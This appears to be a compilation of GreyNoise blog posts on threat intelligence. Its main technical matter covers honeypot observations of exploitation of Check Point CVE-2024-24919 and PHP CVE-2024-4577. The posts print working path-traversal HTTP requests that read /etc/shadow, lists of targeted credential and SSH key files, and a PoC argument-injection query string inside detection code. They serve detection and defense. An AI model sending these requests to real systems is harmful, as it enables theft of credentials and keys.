Understanding the broad landscape of election cybersecurity threats is the first step toward grasping the complexity and scope of the challenge. That knowledge helps the public appreciate the effort required to secure elections and underscores the importance of vigilance and proactive measures.

As we approach the 2024 elections, enhanced security measures, such as implementing multifactor authentication and conducting regular vulnerability assessments, are vital. Public awareness and education about common disinformation tactics can help mitigate the impact of false information. At the same time, collaboration and information sharing between federal, state, and local agencies, as well as private sector partners, are essential for a coordinated response to emerging threats.

By comprehending and addressing the diverse array of threats, tactics, and actors in the election cybersecurity landscape, we can better protect the integrity of our democratic processes and ensure that every vote counts.

Perma-Vuln: D-Link DIR-859, CVE-2024-0769

Discover the latest findings from GreyNoise Labs as we delve into a perma-vuln plaguing the D-Link DIR-859 router. In our newest blog post, "Perma-Vuln: D-Link DIR-859, CVE-2024-0769," we uncover the intricacies of CVE-2024-0769, a path traversal vulnerability affecting D-Link DIR-859 WiFi routers, leading to information disclosure.

The exploit's variations, including one observed in the wild by GreyNoise, enable the extraction of account details from the device. The product is End-of-Life, so it won't be patched, posing long-term exploitation risk. The vulnerability can be used to retrieve multiple XML files from the device.

Click here to see the details and interesting payload that Sift has identified.

SolarWinds Serv-U (CVE-2024-28995) exploitation: We see you!

On June 5, 2024, SolarWinds published an advisory detailing CVE-2024-28995 - a path-traversal vulnerability in Serv-U, discovered by Hussein Daher. Our Labs team - with our brand new deception engineer - seized this opportunity to deploy a new honeypot they've been working on. It's supposed to look more real - and vulnerable! - than past honeypots.

What did they discover?

They show off all kinds of information gleaned from their honeypot - who's attacking it, what files they're trying to steal, how often they come back, and more.

But, that's not all!

They actually managed to capture a live attacker making several copy/paste mistakes, and attempting to correct the exploit only to foul it up again! They track the attacker's progress over the course of 4 hours, including one instance where they sent the completely wrong exploit (which happens to be for an unpatched vulnerability!).

Check out the full blog on GreyNoise Labs to learn more about this vulnerability and our observations.

What's Going on with CVE-2024-4577 (Critical RCE in PHP)?

Check out the latest from GreyNoise Labs as we examine the technical details of CVE-2024-4577, a serious remote code execution vulnerability in PHP affecting Windows deployments. Discovered by DEVCORE and demonstrated by watchTowr, this vulnerability abuses the 'best-fit' character mapping Windows applies when converting characters to the system code page: a byte that PHP's argument filter does not treat as a hyphen (the soft hyphen, 0xAD) is silently converted into one. This allows attackers to inject php-cgi command-line options via the HTTP query string.

Detailed examples of payloads observed in the wild to achieve remote code execution are included, showcasing how attackers exploit the vulnerability in the real world. These payloads range from simple PHP code snippets to more complex scripts that download and execute malicious binaries.
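To make the mechanism concrete, here is an added Python example (not DEVCORE's, watchTowr's or GreyNoise's code) that derives the argv php-cgi would receive from a query string, emulates the best-fit conversion, and flags tokens that only become options after that conversion. The 0xAD-to-hyphen mapping is the documented case and the only one modelled here; the query string used as sample input is the shape of the public PoC, reconstructed for the example rather than quoted from this post, and the mapping only fires on certain ANSI code pages (the DEVCORE advisory names Chinese and Japanese locales).

```python
"""CVE-2024-4577 triage: derive the argv php-cgi would see from a query
string and flag options that only appear after Windows best-fit mapping.
Added example, not DEVCORE's, watchTowr's or GreyNoise's code."""
from urllib.parse import unquote_to_bytes

# Windows "best-fit" conversion substitutes the nearest ASCII look-alike for
# bytes that have no exact character in the target ANSI code page. The one
# that matters for this bug is the soft hyphen (0xAD) becoming '-' (0x2D).
# Assumption: only that mapping is modelled; real code pages carry more.
BEST_FIT = {0xAD: ord("-")}


def best_fit(raw: bytes) -> str:
    """Emulate the lossy byte-to-character conversion of an argument."""
    return bytes(BEST_FIT.get(b, b) for b in raw).decode("latin-1")


def cgi_argv(query: str) -> list[str]:
    """RFC 3875 'indexed query': when the query string has no literal '=',
    the gateway splits it on '+' and hands the URL-decoded pieces to the
    CGI program as argv. Returns [] when the argv route is not taken."""
    if "=" in query:
        return []
    return [best_fit(unquote_to_bytes(tok)) for tok in query.split("+") if tok]


def injected_options(query: str) -> list[str]:
    """Tokens that turn into php-cgi options only because of best-fit.
    PHP's earlier guard (added for CVE-2012-1823) looks for a literal '-'
    at the start of the decoded query, so the signature of this bug is a
    token whose decoded bytes do not begin with '-' but whose best-fit
    form does."""
    if "=" in query:
        return []
    hits = []
    for tok in (t for t in query.split("+") if t):
        decoded = unquote_to_bytes(tok)
        converted = best_fit(decoded)
        if not decoded.startswith(b"-") and converted.startswith("-"):
            hits.append(converted)
    return hits


# Query-string shape of the public PoC (reconstructed for this example, not
# quoted from the post): two 0xAD-prefixed 'd' tokens become '-d' overrides.
POC_QUERY = "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"

if __name__ == "__main__":
    print("argv:", cgi_argv(POC_QUERY))
    print("injected options:", injected_options(POC_QUERY))
```

Note the two checks that make the detector useful rather than noisy: a query containing a literal `=` never takes the argv path at all, and a token that already starts with a literal `-` is the old, already-blocked CVE-2012-1823 shape, so it is not reported as a best-fit bypass.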

Check out the detailed post here for a deeper dive into the technical details and the full range of payloads.

What’s Going on With Check Point (CVE-2024-24919)?

On May 28, 2024, Check Point published an advisory (and emailed customers) regarding CVE-2024-24919, a CVSS 8.6 vulnerability that they described using fairly vague language: "exploiting this vulnerability can result in accessing sensitive information on the Security Gateway. This, in certain scenarios, can potentially lead the attacker to move laterally and gain domain admin privileges."

Although they buried the lede a bit, if you scroll way down and click through a bit, you'll see that attacks in the wild occurred as far back as April 7, 2024 (nearly 2 months)! Two days after the advisory came out (May 30, 2024), we published a tag, which currently shows rapidly increasing exploitation:

Although you can’t see it on the graph, the very first attempts we saw were on May 31, 2024 at around 9:30am UTC. We also observed some attempted exploits on May 30, 2024, but they don’t show up in our public data because they don’t actually work (more on that below).

On the same day (May 30, 2024), watchTowr labs published an amazing write-up that includes a working proof of concept. On that same day, CISA added it to the Known Exploited Vulnerabilities list.

On May 31, 2024, our friends at Censys published their write-up, which indicated that there are nearly 14,000 devices running some version of that software, although it’s not clear how many of those have exposed management ports.

The vulnerability

The core vulnerability is a straightforward path traversal issue. One of the folks on my team reverse engineered the patch concurrently with watchTowr and came up with basically the same exploit (this one is from watchTowr):

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

Since the server runs as root, an attacker can grab any file on the filesystem! We’ll show you what attackers are actually searching for below.

Our observations

Sift

Although we tagged this issue very quickly, we actually saw the first exploit attempt, using a non-working payload, hitting Sift on May 30, 2024 - presumably somebody thought they’d figured it out and pushed the big “go” button a bit too quickly:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 38
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)

/clients/MyCRL/../../../..//etc/shadow

We started seeing actual exploitation attempts logged in Sift on May 31, 2024:

POST /clients/MyCRL HTTP/1.1
Host: <ip>
Connection: close
Accept-Encoding: gzip
Connection: close
Content-Length: 39
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

aCSHELL/../../../../../../../etc/shadow

I’m always impressed when an automated system can catch a novel exploit without being told about it!

Honeypot data

We manually searched our honeypot data going back 90 days prior to today (June 4, 2024), and the oldest exploit attempts that we see started on May 30, 2024, at about 5pm UTC:

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/<IP_ADDRESS> Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38

/clients/MyCRL/../../../..//etc/passwd

The word “attempts” is doing a lot of work in that sentence because, from what we can tell, this payload doesn’t actually work - perhaps somebody pressed the big red button before actually testing their exploit?

In any case, the IP address using that broken payload was 125.229.221.55, a Taiwan-based address that started scanning for HNAP-enabled devices on May 30, 2024, then a few hours later (on the same day) started scanning for CVE-2024-24919. We can’t say with certainty whether the HNAP scan is related, but it’s the only other traffic we’ve ever seen from that IP address. In the exploits, the IP attempted to fetch /etc/passwd and /etc/shadow.

The first real exploitation we observed began on the morning of May 31, around 9:40am UTC, when a New York-based IP address, 45.88.91.78, took a break from searching for Cisco ASA appliances and started launching exploits for this issue with a payload that would appear to actually work (and, in fact, is suspiciously identical to watchTowr’s PoC, including the number of ../s):

POST /clients/MyCRL HTTP/1.1
Host: <IP_ADDRESS>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:82.0) Gecko/20100101 Firefox/82.0
Connection: close
Content-Length: 39
Accept-Encoding: gzip

aCSHELL/../../../../../../../etc/shadow

Around that same time, a chorus of different scanners emerged that used a bunch of different paths. Due to the nature of the vulnerability, it’s very hard to determine the actual intent of the attacker - all we know is which file they’re trying to fetch. Whether they’re using that to steal passwords or to test the vulnerability is hard to know.

That being said, as of June 4, 2024, here is the top-10 list of plausibly-working payloads that we’ve observed, with the counts:

4805 ../../../../../../../etc/fstab
2453 ../../../../../../../etc/shadow
980 ../../../../../../../sysimg/CPwrapper/SU/Products.conf
959 ../../../../../../../config/db/initial
508 ../../../../../../../etc/passwd
202 ../../../../../../../home/*/.ssh/authorized_keys
166 ../../../../../../../opt/checkpoint/conf/
165 ../../../../../../../etc/ssh/sshd_config
163 ../../../../../../../etc/vpn/vpn.conf
161 ../../../../../../../home/*/.ssh/id_rsa

It’s interesting to contrast that with this list, which we generated yesterday (June 3, 2024):

1615 ../../../../../../../etc/fstab
491 ../../../../../../../etc/passwd
486 ../../../../../../../etc/shadow
197 ../../../../../../../home/*/.ssh/authorized_keys
161 ../../../../../../../opt/checkpoint/conf/
160 ../../../../../../../etc/ssh/sshd_config
158 ../../../../../../../etc/vpn/vpn.conf
156 ../../../../../../../home/*/.ssh/id_rsa
94 ../../../../../../../home/*/.ssh/known_hosts
83 ../../../../../../../home/root/.ssh/authorized_keys

As you can see, /etc/fstab remains a popular target - probably because it’s a reliable path being used by some off-the-shelf scanner(s).

/etc/shadow of course remains popular, but we’re suddenly seeing a lot of attempts to pull /sysimg/CPwrapper/SU/Products.conf and /config/db/initial that we weren’t seeing yesterday. That demonstrates how the attack is evolving day over day!
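The tallies above come out of GreyNoise’s honeypot pipeline. As an added example that is not GreyNoise code, the following Python reproduces the mechanics on a handful of constructed requests modelled on the ones quoted in this post: it detects a CVE-2024-24919 attempt (a POST to /clients/MyCRL whose body carries a `..` path component), resolves the traversal to the file the request would actually reach, and counts the results the way the lists above do. The sample capture, the documentation IP address in it and the depth helper are constructed for illustration; the payload bodies are the shapes shown on this page.

```python
"""CVE-2024-24919 request triage: detect the traversal, resolve the target
file, and tally what attackers ask for. Added example, not GreyNoise code."""
import posixpath
import re
from collections import Counter

# Constructed sample capture. Bodies are the payload shapes quoted in this
# post; the host is a documentation address and the headers are trimmed.
SAMPLE_REQUESTS = [
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 38\r\n\r\n"
    "/clients/MyCRL/../../../..//etc/passwd",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 39\r\n\r\n"
    "aCSHELL/../../../../../../../etc/shadow",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 38\r\n\r\n"
    "aCSHELL/../../../../../../../etc/fstab",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 38\r\n\r\n"
    "aCSHELL/../../../../../../../etc/fstab",
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 56\r\n\r\n"
    "aCSHELL/../../../../../../../home/*/.ssh/authorized_keys",
    # Traffic that must not be counted: a plain body on the same endpoint,
    # and a request to an unrelated path.
    "POST /clients/MyCRL HTTP/1.1\r\nHost: 192.0.2.10\r\nContent-Length: 13\r\n\r\n"
    "some-crl-name",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n",
]

# A '..' component anywhere in the body, whether or not it is the first one.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def parse_request(raw: str) -> tuple[str, str, str]:
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, path, _version = head.split("\n", 1)[0].split(" ", 2)
    return method, path, body


def is_cve_2024_24919_attempt(method: str, path: str, body: str) -> bool:
    """Detection rule: POST to the vulnerable /clients/MyCRL handler with a
    '..' component in the body. Matching the traversal rather than a fixed
    prefix catches both the 'aCSHELL/' PoC shape and the broken
    '/clients/MyCRL/..' variant that showed up first."""
    return method == "POST" and path == "/clients/MyCRL" and bool(TRAVERSAL.search(body))


def traversal_depth(body: str) -> int:
    """Number of '..' components in the payload (the watchTowr PoC uses 7)."""
    return sum(1 for comp in body.split("/") if comp == "..")


def resolve_target(body: str) -> str:
    """Resolve the traversal to the absolute file the request reaches.
    Anchoring the payload at '/' makes surplus '..' components vanish, which
    is also how the kernel resolves '/..' for a process opening the path."""
    payload = body.strip()
    target = posixpath.normpath("/" + payload.lstrip("/"))
    if payload.endswith("/") and target != "/":
        target += "/"  # keep directory requests distinguishable from files
    return target


def tally_targets(raw_requests: list[str]) -> Counter:
    """Count requested files across a capture, like the top-10 lists above."""
    counts: Counter = Counter()
    for raw in raw_requests:
        method, path, body = parse_request(raw)
        if is_cve_2024_24919_attempt(method, path, body):
            counts[resolve_target(body)] += 1
    return counts


if __name__ == "__main__":
    for target, n in tally_targets(SAMPLE_REQUESTS).most_common():
        print(f"{n:>5} {target}")
```

Resolving the path before counting is what lets payloads with different prefixes or different numbers of `../` collapse onto the same target, so the tally answers the only question the traffic can answer: which file was the attacker after.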

Unfortunately, we didn’t directly observe the 0-day exploitation prior to the advisory being released; presumably, the attacks were targeted and didn’t hit our sensor network (although as we expand our new sensors and personas to real networks, we expect to start seeing this type of 0-day exploitation in Sift!)

Conclusion

With a public proof of concept out, and exploitation quickly ramping up, we recommend patching Check Point as soon as possible!

Cybersecurity in the Age of AI: What Experts are Saying

The cybersecurity market is undergoing a noticeable shift with the integration of AI, transitioning from using AI as a replacement for Googling to leveraging its advanced capabilities in pattern recognition and anomaly detection. Currently, there are many questions about what AI can truly achieve today and what the future holds. To address this, we assembled a panel of seasoned security professionals for an open discussion on the real potential of AI in cybersecurity and what is merely adding to the noise.

On Thursday, May 30th, GreyNoise is hosting a live webinar “AI for Cybersecurity: Sifting the Noise.” To give you a taste of what’s to come, we have asked each of our presenters a key question touching on one of the many topics we will explore in the discussion, let’s dig into their answers below:

Bob Rudis, VP of Data Science and Research

Q: What do you think is currently the biggest lie about AI?

A: The biggest misconception is that AI (particularly LLMs/GPTs) is seen as more than just a tool. Unlike traditional machine learning or a dictionary/thesaurus, these AI systems are marketed as intelligent actors or companions. However, they are simply tools that excel at understanding human input and generating responses based on vast amounts of data. Their perceived intelligence comes from their ability to produce useful outputs by recognizing patterns in data, not from any inherent understanding or consciousness.

Daniel Grant, Principal Data Scientist

Q: What AI advancement in the past few years are you most excited about?

A: The most obvious advancement is the development of highly capable LLMs. Just a few years ago, getting GPT-2 to produce coherent text was a challenge. Now, we have 70-billion parameter models that can run on laptops and chatbots that can pass the Turing test at your local Toyota dealership. Another exciting advancement is the improved quality of vector databases, which allow for direct, real-time access to entire datasets, reducing the need for compact machine learning models.

Ron Bowes, Security Researcher

Q: What's the most surprising thing an AI you've used has surfaced?

A: At GreyNoise, we developed a tool called Sift, which runs traffic seen by honeypots through magic machine-learning algorithms to help us (and customers!) see what attackers are up to each day.

One exploit that stood out to me a couple months ago was an attempt to exploit F5 BIG-IP that I wrote about on our Labs Grimoire blog. I'd recently spent time tidying up our F5 BIG-IP rules, since there's a lot of overlap between the various vulnerabilities and exploits (that is, several different vulnerabilities use very similar-looking exploits, and some of our older tags were mixing them up). One of the vulnerabilities I ran into was an exploit for CVE-2022-1388 (auth bypass), chained with CVE-2022-41800 (authenticated code execution, which I initially discovered and reported).

What was particularly interesting about that one is that they used the proof of concept (PoC) from the original CVE-2022-41800 disclosure, which I had designed to look super obvious, instead of using the actual exploit we also released. Not only that, but because CVE-2022-41800 is an *authenticated* RCE, they combined my PoC with a separate authentication-bypass vulnerability (CVE-2022-1388), which already had an RCE exploit that didn't require a secondary vulnerability. So, not only did they use the super obvious PoC, its usage was entirely unnecessary as well!

Presumably, the point of using this unusual combination was to avoid detection, but instead they just stood out more!

---

If these insights pique your interest, join us on Thursday for the live event where you can ask your own questions to our expert panel.

Honeypots Are Back: The Movie: The Blog

GreyNoise was founded to see what others don’t. That quest led us to build a unique global network of thousands of sensors across hundreds of strategically selected points of presence, giving cybersecurity practitioners unparalleled insight into online activity, whether malicious or benign. 

And in 2023, we saw something new.

In the second quarter of 2023, GreyNoise researchers observed a substantial change in internet scanning behavior. Malicious inventory scans dropped significantly in frequency and scale, and the vast majority of these types of scans now come from benign sources. This, along with the speed at which compromises follow vulnerability announcements, strongly suggests more capable attacker groups have implemented their own form of “attack surface monitoring” to avoid tripping existing defenses. Attackers are now less likely to risk their reconnaissance infrastructure being detected and flagged before they have established confidence in a successful attack path.

A change in attacker behavior is rendering current defenses less effective. But an established technique is ready to rise to the challenge. Honeypots are back.

With attackers routing around observation and detection, traditional third-party threat intelligence cannot provide the targeted attack visibility that defenders need. A first-party, honeypot-based approach is ready to step into the breach.

While honeypot programs have traditionally struggled with deployment, operation, and data analysis, new technology is changing the game. Advances in infrastructure automation, network traffic shaping, cloud computing, and artificial intelligence make it possible to consistently identify novel attacks and reveal attacker infrastructure. New honeypot networks are easy to deploy, with flexible impersonation, believable personas, and automated analysis. Whether on an organization’s perimeter or deployed across the globe, they provide the insights defenders need to protect key systems before a breach. 

At GreyNoise, we haven’t just focused on tech leadership — we’ve brought in thought leadership as well. In order to educate the market about these new challenges, and how honeypots can help tackle them, our deception and intelligence experts Andrew Morris and Bob Rudis have published the Honeypots Are Back report. This report:

  • Breaks down targeted attacks
  • Compares third- and first-person threat intelligence
  • Discusses traditional honeypot challenges
  • Establishes a new honeypot maturity framework
  • Provides a security checklist for defenders to implement this necessary capability

To dive deeper into each of these topics, read the report here. To see a demonstration of the new honeypot capabilities under development at GreyNoise today, watch our on-demand honeypot webinar here. And if you’re ready to discuss standing up a mature honeypot network in your own environment, talk to our team.

NetNoiseCon - Recapping our Debut Event

We had a blast at NetNoiseCon on April 19th and we hope you did too! If you missed out, don't worry - we've got you covered with this recap.

From incredible technical talks to insightful career advice from industry leaders, there was something for everyone. We strongly encourage you to watch each of the talks and soak in the wisdom shared by our stellar lineup of speakers.

Watch the full playlist of NetNoiseCon videos on YouTube here.

Technical Talks & Briefs:

Special Storm⚡️Watch briefing from boB Rudis - GreyNoise’s boB Rudis shares a fun and insightful brief on several active APT groups and the targeting of industrial control systems.

Trashing the Pandas: Analyzing Current Infrastructure Trends and T9000v2 - A Mustang Panda Case Study - This incredible technical talk from floofpwn was a crowd pleaser. Join floofpwn as he analyzes Mustang Panda malware and explores current infrastructure trends. Threat Hunters & Researchers should dig this talk!

Methods of Finding Threat Signals - Proofpoint’s Greg Lesnewich presented his methods for finding signal within the noise, finding anomalies in the data, and how to use layering techniques to find threats.

Vintage Internet Noise - GreyNoise’s Kimber Duke dives into the vintage internet vulnerabilities, many of which are 20+ years old, that still haunt us today.

Out of Touch, Out of Timeline - Making Sense of Temporal Correlation - Jonathan Reiter from Dragos shares his method of time series analysis, leveraging tools like GreyNoise’s timeline of observed activity, to investigate scan and host behavior.

Career Advancement & Advice Talks

Brain skills | functions | AI - Santiago Holley, VP of Threat Management at Redtrace Technologies, shares his thoughts on the strengths of AI and the inherent strengths of humans and how our brains work - and how we can bring those two together.

Stress, Mindfulness, & Mental Health in Cybersecurity - Matt Johansen, writer of the Vulnerable U Newsletter, explores the particular challenges and stresses that many in cybersecurity face, and how to deal with them. This is a fantastic honest look at our work in InfoSec and the struggles that many have with mental health.

How I Got Into CyberSecurity - GreyNoise Ambassador Joseph McDonagh shares his unorthodox career path from the military into cybersecurity. At the end, Joseph also shares how he uses GreyNoise “backwards” and leverages Splunk.

---

Huge thanks to all of our speakers - we really appreciate their time and insight. Also, thank you to everyone who tuned in and joined us live at NetNoiseCon, we had a blast!

We will bring NetNoiseCon back later this year, so stay tuned for more news about the next event. In the meantime, join us on Discord and say hi!

2024 Verizon DBIR: Surviving the Year of the Vuln

The 2024 edition of the Verizon Data Breach Investigations Report (DBIR) has finally been released! The team did their usual bang-up job pulling key knowledge threads from the massive volume of data submitted by their ever-increasing number of contributors (of which GreyNoise is one!). Our researchers have pored over this tome to identify critical themes that should be of great import to GreyNoise customers and community.

The Year Of The Vuln

Identifying when attackers attempt to exploit vulnerabilities on internet-facing endpoints is at the heart of what we do at GreyNoise. So, it comes as no surprise that the DBIR team “witnessed a substantial growth of attacks involving the exploitation of vulnerabilities as the critical path to initiate a breach when compared to previous years.” The 180% increase was felt — almost daily — by all who keep track of headlines in the cybersecurity press. Our GreyNoise sensor fleet caught an extra 200K unique IPv4 addresses slinging malicious tagged activity our way (4.2 million malicious IPv4s in 2022 vs. 4.4 million in 2023), and the volume from those adversarial sources went from just over 10 million malicious tagged events to 13+ million.

One thing we did not expect was vulnerability exploitation chipping away at the volume of both credential-based attacks and phishing as the critical path action to initiate a breach, as seen in Figure 6 from the report:

Historically, phishing has been one of the most successful attack paths for our adversaries, and the volume of lost and stolen credentials is stunningly huge. However, organizations have been steadily investing in more advanced phishing protection (including awareness training), and credential blasts are both noisy and increasingly thwarted as organizations rely more heavily on the elevated protections provided by identity and authentication providers like Okta.

Conversely, using internet infrastructure to find and exploit vulnerable, exposed services can be a risk-free activity for attackers, and there is an almost endless supply of both new vulnerabilities and unpatched hosts. GreyNoise excels at identifying this activity, and we provide the timeliest and most comprehensive information on those attack types and sources, bar none.

It was also a bit distressing, though not surprising (given Figure 6), to see that vulnerability exploitation was at the heart of third-party-related breaches.

Figure 10. Action varieties in selected supply chain interconnection breaches (n=1,075)

You Don’t Have Time To Patch

Every defender should print out page 21 of the 2024 DBIR and tape it to their wall (or, cubicle, if you’re in the 50% of IT folks still commuting to offices).

Most cybersecurity folks are not familiar with the “survival analysis” shown in Figure 19. It’s just a fancy way of estimating the time until some event occurs. This analysis focuses on vulnerability remediation data (i.e., “patching”), with an emphasis on how long it takes organizations to patch vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog.

GreyNoise researchers are huge fans of CISA KEV. We even benchmark ourselves against it! We meet or beat CISA over 62% of the time when it comes to having a tag ready for defenders to use. How do our customers use these tags? Well, the primary way is to block activity from IP addresses associated with these tags. While this may not prevent pinpoint targeted attacks, it absolutely buys them time to keep safe from opportunistic attacks, and helps them identify those targeted attacks much faster, and with greater precision.

Our own data clearly shows that once a proof-of-concept (PoC) is available, attackers waste zero time going after vulnerable systems. And, there is increasingly little daylight between when a CVE is published and when a PoC becomes available.

Seeing that 85% of CISA KEV entries remain unpatched after 30 days clearly shows that most organizations have no time to patch. This means protecting these assets from harm during that 30-day exposure is paramount.

Closing The Door On Attackers

The DBIR team used the “open door” metaphor for how attackers made their way into organizations in 2023. At GreyNoise, we’re highly focused on helping organizations safeguard every single entry point in their internet-facing infrastructure, while also laying out some of our own trapdoors to help confuse and ensnare them.

With GreyNoise, organizations can gain an edge over their adversaries, using our advanced sensors to identify targeted attacks quicker than ever before. Combined with the proven, battle-tested intelligence in our existing Noise dataset, defenders now have the tools to both make it extremely difficult for attackers to be successful, and slow them down long enough to finish asset remediation efforts. Join us as we work to chip away at the million-incident record the DBIR set this year, and turn the tide against our combined foes! You can get started with our data here, or connect with our team to talk about advanced features.

What We're Reading: April 2024

Sam Houston // Senior Community Manager

💡 AWS Made Easy Livestream Ep. 99.5 | Rahul Subramaniam + Stephen Barr 

Thoughts: Ezra Klein’s interview with the CEO of Anthropic is an interesting discussion about the speed of growth of the industry and the impact AI will have on our electricity consumption, the impact on jobs, and more. Very interesting listen!

Bob Rudis // VP Data Science & Research

🚀 Book: The Ascendant Wars: Hellfire | Rhett C. Bruno & M.B. Vance

Why I like it: It has stylistic and narrative elements like The Expanse novels, and presents an intriguing future where some humans (dubbed Wardens) have outgrown their humanity thanks to bioengineering and rule the galaxy with ruthless efficiency. This story centers around the folks impacted by a particularly horrible Warden who decides to mess with the pseudo-stability of the regime in order to gain control. Excellent writing.

🪙 Article: Lessons after a half-billion GPT tokens | Ken Kantzer 

Thoughts: It was a good read as well. I don't necessarily agree with all the points, but the author's practical take on making real-world apps with "AI" is very refreshing amidst all the hype.

Louis Evans // Director of Product Marketing

💨 Atmospheric Disturbances | Rivka Galchen

Why I like it: This brilliant, disturbing novel centers on a psychiatrist suddenly convinced his wife has been replaced by an imposter (presumably a reference to a real disorder, Capgras delusion) and that the secret to finding his real wife is hidden in an obscure paper by a research meteorologist—clearly based on the author’s own father. Hilarious, insightful, surprisingly punny—and though written in 2006, the bite-sized chapters are perfect for our age of internet distractions (just me?).

🚪 The Saint of Bright Doors | Vajra Chandrasekera

Thoughts: Incisive, bizarre, and with a last-act twist that slides perfectly, yet shockingly, into place, The Saint of Bright Doors is certainly deserving of its string of award nominations. I saw Chandrasekera read an excerpt from this book on his tour; he chose the scene where the protagonist’s mother tells her son “the doctors will tell you I’m dying of cancer . . . but really it’s because I’m disappointed in you.” But Bright Doors does not disappoint. 

🐉 The Dragon Waiting | John M. Ford

TLDR: Neil Gaiman wrote that this book “contains no dragons”. It’s not quite true—and Gaiman’s full quote contains a qualifier that I’m cunningly concealing from you—but close enough. Now consider what it means to recommend a dragonless book about dragons. Familiarity with the Wars of the Roses and strong opinions about the Byzantine empire will be greatly rewarded. 

Ron Bowes  // Lead Security Researcher

🪄 Book: Maximum Entertainment 2.0 | Ken Weber

Why I like it: It is a book about having a more interesting stage presence as a magician. I'm not a (professional (or good)) magician, but telling stories and being interesting on stage applies to all of us!

🧛 Book: The Twelve | Justin Cronin 

Backstory: Vampire fiction might be too embarrassing to post…for context, I go to the local used bookstore to buy random books. I bought "The Passage" by Justin Cronin and got sucked into (🥁) the story about the world being overrun by a vampire virus. Halfway through, I realized it's a trilogy; now I'm halfway through the second book ("The Twelve"), with the third ready to go. 

🌟 Textbook: Improv 101 | Jet City Improv 

Thoughts: Improv classes are a great way to meet people, build confidence, and have fun in a super supportive environment!

Konstantin // Senior Researcher

🧠 Book: Being You: A New Science of Consciousness | Anil Seth 

Thoughts: It is a nice read. Basically, “the entirety of perceptual experience is a neuronal fantasy that remains yoked to the world through a continuous making and remaking of perceptual best guesses, of controlled hallucinations.” Or how I stopped worrying and learned to love the absence of free will.
